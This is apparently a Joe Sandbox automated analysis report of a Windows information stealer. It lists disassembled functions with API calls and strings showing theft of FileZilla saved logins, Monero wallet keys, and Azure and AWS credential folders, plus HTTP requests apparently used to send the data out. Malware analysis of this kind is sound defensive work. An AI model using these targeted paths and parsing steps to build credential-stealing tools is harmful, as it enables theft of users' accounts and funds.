                        • Part of subcall function 001C99C0: LocalFree.KERNEL32(001C148F), ref: 001C9A90
                        • Part of subcall function 001C99C0: CloseHandle.KERNEL32(000000FF), ref: 001C9A9A
                        • Part of subcall function 001D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001D8E52
                      • GetProcessHeap.KERNEL32(00000000,000F423F,001E0DBA,001E0DB7,001E0DB6,001E0DB3), ref: 001D0362
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D0369
                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 001D0385
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D0393
                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 001D03CF
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D03DD
                      • StrStrA.SHLWAPI(00000000,<User>), ref: 001D0419
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D0427
                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 001D0463
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D0475
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D0502
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D051A
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D0532
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D054A
                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 001D0562
                      • lstrcat.KERNEL32(?,profile: null), ref: 001D0571
                      • lstrcat.KERNEL32(?,url: ), ref: 001D0580
                      • lstrcat.KERNEL32(?,00000000), ref: 001D0593
                      • lstrcat.KERNEL32(?,001E1678), ref: 001D05A2
                      • lstrcat.KERNEL32(?,00000000), ref: 001D05B5
                      • lstrcat.KERNEL32(?,001E167C), ref: 001D05C4
                      • lstrcat.KERNEL32(?,login: ), ref: 001D05D3
                      • lstrcat.KERNEL32(?,00000000), ref: 001D05E6
                      • lstrcat.KERNEL32(?,001E1688), ref: 001D05F5
                      • lstrcat.KERNEL32(?,password: ), ref: 001D0604
                      • lstrcat.KERNEL32(?,00000000), ref: 001D0617
                      • lstrcat.KERNEL32(?,001E1698), ref: 001D0626
                      • lstrcat.KERNEL32(?,001E169C), ref: 001D0635
                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D068E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                      • API String ID: 1942843190-555421843
                      • Opcode ID: effcd5c100b2f15262818afd6507500d3cadce61ce8ef1dc9c44c10efb7b04cb
                      • Instruction ID: 966a6b4a1e1151fdf2df322cc6f4678676a2f61bb880db51aa5697ab1fe10acd
                      • Opcode Fuzzy Hash: effcd5c100b2f15262818afd6507500d3cadce61ce8ef1dc9c44c10efb7b04cb
                      • Instruction Fuzzy Hash: 50D11172900248ABCB04EBF4DD95EEE7338BF68301F808519F502B7191EF74AA45DB66
                      Function 001C5960 Relevance: 46.0, APIs: 17, Strings: 9, Instructions: 495networkstringmemoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                        • Part of subcall function 001C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001C4839
                        • Part of subcall function 001C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 001C4849
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001C59F8
                      • StrCmpCA.SHLWAPI(?,00E3EA28), ref: 001C5A13
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001C5B93
                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00E3E928,00000000,?,00E3A220,00000000,?,001E1A1C), ref: 001C5E71
                      • lstrlen.KERNEL32(00000000), ref: 001C5E82
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 001C5E93
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001C5E9A
                      • lstrlen.KERNEL32(00000000), ref: 001C5EAF
                      • lstrlen.KERNEL32(00000000), ref: 001C5ED8
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 001C5EF1
                      • lstrlen.KERNEL32(00000000,?,?), ref: 001C5F1B
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 001C5F2F
                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 001C5F4C
                      • InternetCloseHandle.WININET(00000000), ref: 001C5FB0
                      • InternetCloseHandle.WININET(00000000), ref: 001C5FBD
                      • HttpOpenRequestA.WININET(00000000,00E3E948,?,00E3E3A0,00000000,00000000,00400100,00000000), ref: 001C5BF8
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                      • InternetCloseHandle.WININET(00000000), ref: 001C5FC7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                      • String ID: "$"$($($------$------$------$H$
                      • API String ID: 874700897-3552240116
                      • Opcode ID: b86f0f56b74fbc9d124d88caa640e3e42f8ab90b1a0164ed50e99da390e9a285
                      • Instruction ID: bd28d329da05928956c2bc41444da3b47692ebb60b9073e61b19f274c68e5d66
                      • Opcode Fuzzy Hash: b86f0f56b74fbc9d124d88caa640e3e42f8ab90b1a0164ed50e99da390e9a285
                      • Instruction Fuzzy Hash: 7A122271820168ABDB19EBA0DCA5FEE7378BF24701F8041AAF50673191EF706A49CF55
                      Function 001CCEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                        • Part of subcall function 001D8B60: GetSystemTime.KERNEL32(001E0E1A,00E3A280,001E05AE,?,?,001C13F9,?,0000001A,001E0E1A,00000000,?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001D8B86
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001CCF83
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 001CD0C7
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001CD0CE
                      • lstrcat.KERNEL32(?,00000000), ref: 001CD208
                      • lstrcat.KERNEL32(?,001E1478), ref: 001CD217
                      • lstrcat.KERNEL32(?,00000000), ref: 001CD22A
                      • lstrcat.KERNEL32(?,001E147C), ref: 001CD239
                      • lstrcat.KERNEL32(?,00000000), ref: 001CD24C
                      • lstrcat.KERNEL32(?,001E1480), ref: 001CD25B
                      • lstrcat.KERNEL32(?,00000000), ref: 001CD26E
                      • lstrcat.KERNEL32(?,001E1484), ref: 001CD27D
                      • lstrcat.KERNEL32(?,00000000), ref: 001CD290
                      • lstrcat.KERNEL32(?,001E1488), ref: 001CD29F
                      • lstrcat.KERNEL32(?,00000000), ref: 001CD2B2
                      • lstrcat.KERNEL32(?,001E148C), ref: 001CD2C1
                      • lstrcat.KERNEL32(?,00000000), ref: 001CD2D4
                      • lstrcat.KERNEL32(?,001E1490), ref: 001CD2E3
                        • Part of subcall function 001DA820: lstrlen.KERNEL32(001C4F05,?,?,001C4F05,001E0DDE), ref: 001DA82B
                        • Part of subcall function 001DA820: lstrcpy.KERNEL32(001E0DDE,00000000), ref: 001DA885
                      • lstrlen.KERNEL32(?), ref: 001CD32A
                      • lstrlen.KERNEL32(?), ref: 001CD339
                        • Part of subcall function 001DAA70: StrCmpCA.SHLWAPI(00E38ED0,001CA7A7,?,001CA7A7,00E38ED0), ref: 001DAA8F
                      • DeleteFileA.KERNEL32(00000000), ref: 001CD3B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                      • String ID:
                      • API String ID: 1956182324-0
                      • Opcode ID: f047c622f00610c9ca8de71fd143c19f14e163f81d16eaff0d8738028ab57926
                      • Instruction ID: 4d06bf507ca74a6116ab75695c20b0474f942abba1576efd66114a49e5d7fb26
                      • Opcode Fuzzy Hash: f047c622f00610c9ca8de71fd143c19f14e163f81d16eaff0d8738028ab57926
                      • Instruction Fuzzy Hash: B7E16F72810218ABCB04FBA0DD96EEE7338BF24301F904169F507B7291DF35AA15DB66
                      Function 001D8320 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 196registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      • RegOpenKeyExA.ADVAPI32(00000000,00E3B528,00000000,00020019,00000000,001E05B6), ref: 001D83A4
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 001D8426
                      • wsprintfA.USER32 ref: 001D8459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 001D847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 001D848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 001D8499
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                      • String ID: - $ $%s\%s$?
                      • API String ID: 3246050789-1613996215
                      • Opcode ID: 50a8d11458ab744efdf9285bae1c0de2d814fac27774b8ee2d80616e688cb7e9
                      • Instruction ID: c9df9a9b01e2b92fdee8e068cd88abf40695c5a031d056df881d44b5eb0bb462
                      • Opcode Fuzzy Hash: 50a8d11458ab744efdf9285bae1c0de2d814fac27774b8ee2d80616e688cb7e9
                      • Instruction Fuzzy Hash: 75811F71910228ABDB28DF54CD95FEA77B8FF18700F4082D9E509A6240DF71AB85CF95
                      Function 001CC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00E3D1F8,00000000,?,001E144C,00000000,?,?), ref: 001CCA6C
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 001CCA89
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 001CCA95
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CCAA8
                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 001CCAD9
                      • StrStrA.SHLWAPI(?,00E3D2D0,001E0B52), ref: 001CCAF7
                      • StrStrA.SHLWAPI(00000000,00E3D210), ref: 001CCB1E
                      • StrStrA.SHLWAPI(?,00E3DAC0,00000000,?,001E1458,00000000,?,00000000,00000000,?,00E38F00,00000000,?,001E1454,00000000,?), ref: 001CCCA2
                      • StrStrA.SHLWAPI(00000000,00E3DA80), ref: 001CCCB9
                        • Part of subcall function 001CC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 001CC871
                        • Part of subcall function 001CC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 001CC87C
                      • StrStrA.SHLWAPI(?,00E3DA80,00000000,?,001E145C,00000000,?,00000000,00E39010), ref: 001CCD5A
                      • StrStrA.SHLWAPI(00000000,00E39090), ref: 001CCD71
                        • Part of subcall function 001CC820: lstrcat.KERNEL32(?,001E0B46), ref: 001CC943
                        • Part of subcall function 001CC820: lstrcat.KERNEL32(?,001E0B47), ref: 001CC957
                        • Part of subcall function 001CC820: lstrcat.KERNEL32(?,001E0B4E), ref: 001CC978
                      • lstrlen.KERNEL32(00000000), ref: 001CCE44
                      • CloseHandle.KERNEL32(00000000), ref: 001CCE9C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                      • String ID:
                      • API String ID: 3744635739-3916222277
                      • Opcode ID: 2006263ec960d4714c5ec74ffb3ecd9872b1f757be97b84ee78810620d2e8ea2
                      • Instruction ID: 528c9720f4476e76c469a1afc1f65a996345cc9b218cbd37d2cfc54a34d5042b
                      • Opcode Fuzzy Hash: 2006263ec960d4714c5ec74ffb3ecd9872b1f757be97b84ee78810620d2e8ea2
                      • Instruction Fuzzy Hash: 09E14771C00158ABDB14EBA4DD95FEE7778AF24300F80416AF50677291EF306A4ACF66
                      Function 001D4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001D8E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 001D4DB0
                      • lstrcat.KERNEL32(?,\.azure\), ref: 001D4DCD
                        • Part of subcall function 001D4910: wsprintfA.USER32 ref: 001D492C
                        • Part of subcall function 001D4910: FindFirstFileA.KERNEL32(?,?), ref: 001D4943
                      • lstrcat.KERNEL32(?,00000000), ref: 001D4E3C
                      • lstrcat.KERNEL32(?,\.aws\), ref: 001D4E59
                        • Part of subcall function 001D4910: StrCmpCA.SHLWAPI(?,001E0FDC), ref: 001D4971
                        • Part of subcall function 001D4910: StrCmpCA.SHLWAPI(?,001E0FE0), ref: 001D4987
                        • Part of subcall function 001D4910: FindNextFileA.KERNEL32(000000FF,?), ref: 001D4B7D
                        • Part of subcall function 001D4910: FindClose.KERNEL32(000000FF), ref: 001D4B92
                      • lstrcat.KERNEL32(?,00000000), ref: 001D4EC8
                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 001D4EE5
                        • Part of subcall function 001D4910: wsprintfA.USER32 ref: 001D49B0
                        • Part of subcall function 001D4910: StrCmpCA.SHLWAPI(?,001E08D2), ref: 001D49C5
                        • Part of subcall function 001D4910: wsprintfA.USER32 ref: 001D49E2
                        • Part of subcall function 001D4910: PathMatchSpecA.SHLWAPI(?,?), ref: 001D4A1E
                        • Part of subcall function 001D4910: lstrcat.KERNEL32(?,00E3EAB8), ref: 001D4A4A
                        • Part of subcall function 001D4910: lstrcat.KERNEL32(?,001E0FF8), ref: 001D4A5C
                        • Part of subcall function 001D4910: lstrcat.KERNEL32(?,?), ref: 001D4A70
                        • Part of subcall function 001D4910: lstrcat.KERNEL32(?,001E0FFC), ref: 001D4A82
                        • Part of subcall function 001D4910: lstrcat.KERNEL32(?,?), ref: 001D4A96
                        • Part of subcall function 001D4910: CopyFileA.KERNEL32(?,?,00000001), ref: 001D4AAC
                        • Part of subcall function 001D4910: DeleteFileA.KERNEL32(?), ref: 001D4B31
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                      • API String ID: 949356159-974132213
                      • Opcode ID: 39f3ce348de73e09cd7b5e0819815f67d12e43c96d2673afde11992b039fb5b9
                      • Instruction ID: 679b5e13bd04e69677b741882de2c60efd879519a6d26828af24764c39c4884e
                      • Opcode Fuzzy Hash: 39f3ce348de73e09cd7b5e0819815f67d12e43c96d2673afde11992b039fb5b9
                      • Instruction Fuzzy Hash: 0F41B17A94025867CB10F770DC47FED3338AB75700F4044A4B589661C2EFB49BC98B92
                      Function 001D9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                      Download Yara Rule
                      APIs
                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 001D906C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
